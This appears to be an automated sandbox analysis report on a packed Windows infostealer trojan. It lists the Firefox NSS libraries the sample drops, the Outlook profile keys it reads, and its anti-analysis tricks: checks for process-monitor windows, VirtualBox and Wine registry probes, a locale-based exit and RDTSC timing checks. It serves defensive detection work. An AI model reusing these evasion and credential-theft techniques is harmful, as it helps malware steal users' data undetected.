Source: file.exe, 00000000.00000003.1841815108.0000000029B6D000.00000004.00000020.00020000.00000000.sdmp, EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1841815108.0000000029B6D000.00000004.00000020.00020000.00000000.sdmp, EHIIIJDAAAAAAKECBFBAEBKJJJ.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD	0_2_00C610AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5C8B0	0_2_00C5C8B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5A0B9	0_2_00C5A0B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6419C	0_2_00C6419C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C56A86	0_2_00C56A86
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5F233	0_2_00C5F233
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C65B83	0_2_00C65B83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9EBD5	0_2_00B9EBD5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C55495	0_2_00C55495
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C58549	0_2_00C58549
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C62E9D	0_2_00C62E9D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D1E7E7	0_2_00D1E7E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5D784	0_2_00C5D784
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B0A7C9	0_2_00B0A7C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D1BF10	0_2_00D1BF10

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 008945C0 appears 316 times

Source: file.exe, 00000000.00000002.1919540626.000000006C865000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1919703167.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: daqilylv ZLIB complexity 0.9946867173269581

Source: file.exe, 00000000.00000003.1669710829.0000000005230000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_008A8680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_008A3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8C2JB5KJ.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1763704580.000000001D884000.00000004.00000020.00020000.00000000.sdmp, CFIECBFIDGDAKFHIEHJK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1918852320.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1909956473.000000001D98D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1842688 > 1048576

Source: file.exe

Static PE information: Raw size of daqilylv is bigger than: 0x100000 < 0x19bc00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1919651984.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1919363929.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1919651984.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.890000.0.unpack :EW;.rsrc :W;.idata :W; :EW;daqilylv:EW;blehajib:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;daqilylv:EW;blehajib:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_008A9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c6b0d should be: 0x1c4dc1

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: daqilylv
Source: file.exe	Static PE information: section name: blehajib
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0A0DB push ecx; mov dword ptr [esp], eax	0_2_00D0A120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2A0C3 push 19E2D991h; mov dword ptr [esp], esp	0_2_00D2A139
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2A0C3 push 62E85B1Bh; mov dword ptr [esp], eax	0_2_00D2A4E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D558F8 push ebx; mov dword ptr [esp], edx	0_2_00D5591A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C450F5 push ecx; mov dword ptr [esp], edi	0_2_00C4518D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C450F5 push ebx; mov dword ptr [esp], eax	0_2_00C451B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C450F5 push 16D36378h; mov dword ptr [esp], ebx	0_2_00C4524E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C450F5 push edi; mov dword ptr [esp], ebp	0_2_00C45277
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C83090 push 112AC2E9h; mov dword ptr [esp], ecx	0_2_00C830B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push 15467804h; mov dword ptr [esp], esi	0_2_00C610D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push 146D16BFh; mov dword ptr [esp], ecx	0_2_00C61153
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push ebp; mov dword ptr [esp], eax	0_2_00C6119A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push ebp; mov dword ptr [esp], esi	0_2_00C6120D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push edx; mov dword ptr [esp], esi	0_2_00C61238
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push eax; mov dword ptr [esp], 16E1BF12h	0_2_00C6125C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push eax; mov dword ptr [esp], edi	0_2_00C612A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push 2E183101h; mov dword ptr [esp], edx	0_2_00C61315
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push 207DDE1Dh; mov dword ptr [esp], ebp	0_2_00C61327
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push edx; mov dword ptr [esp], eax	0_2_00C613BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push ebx; mov dword ptr [esp], 56BF07BBh	0_2_00C613BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push edx; mov dword ptr [esp], ecx	0_2_00C614A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push ebx; mov dword ptr [esp], 73BC9D44h	0_2_00C6152B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push eax; mov dword ptr [esp], edx	0_2_00C616BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push ecx; mov dword ptr [esp], 13DFC612h	0_2_00C616F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push edx; mov dword ptr [esp], esi	0_2_00C61775
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push eax; mov dword ptr [esp], ecx	0_2_00C61793
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push edi; mov dword ptr [esp], ebp	0_2_00C6186B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push ebp; mov dword ptr [esp], esp	0_2_00C618E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push edx; mov dword ptr [esp], ecx	0_2_00C618EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push 356FC7ADh; mov dword ptr [esp], eax	0_2_00C6197C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C610AD push eax; mov dword ptr [esp], 4482B4E3h	0_2_00C61996

Source: file.exe

Static PE information: section name: daqilylv entropy: 7.952822856786858

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_008A9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13764

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF2053 second address: AF2057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF2057 second address: AF1945 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jc 00007FC4E87CE37Ch 0x00000010 or dword ptr [ebp+122D306Ch], esi 0x00000016 push dword ptr [ebp+122D1265h] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D2E79h], edx 0x00000023 jmp 00007FC4E87CE388h 0x00000028 popad 0x00000029 cld 0x0000002a call dword ptr [ebp+122D3714h] 0x00000030 pushad 0x00000031 jnc 00007FC4E87CE377h 0x00000037 xor eax, eax 0x00000039 cmc 0x0000003a add dword ptr [ebp+122D306Ch], edi 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 mov dword ptr [ebp+122D306Ch], edx 0x0000004a je 00007FC4E87CE377h 0x00000050 clc 0x00000051 mov dword ptr [ebp+122D2D01h], eax 0x00000057 jmp 00007FC4E87CE383h 0x0000005c mov esi, 0000003Ch 0x00000061 stc 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 jg 00007FC4E87CE37Ch 0x0000006c lodsw 0x0000006e jp 00007FC4E87CE37Ch 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jng 00007FC4E87CE384h 0x0000007e pushad 0x0000007f js 00007FC4E87CE376h 0x00000085 mov dword ptr [ebp+122D306Ch], ecx 0x0000008b popad 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 sub dword ptr [ebp+122D35C6h], ebx 0x00000096 push eax 0x00000097 push eax 0x00000098 push edx 0x00000099 push eax 0x0000009a push edx 0x0000009b pushad 0x0000009c popad 0x0000009d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF1945 second address: AF194B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59BA3 second address: C59BB7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC4E87CE376h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jnp 00007FC4E87CE376h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59BB7 second address: C59BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59BBD second address: C59BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC4E87CE376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59BC7 second address: C59BD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59BD3 second address: C59BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007FC4E87CE376h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6AC02 second address: C6AC07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
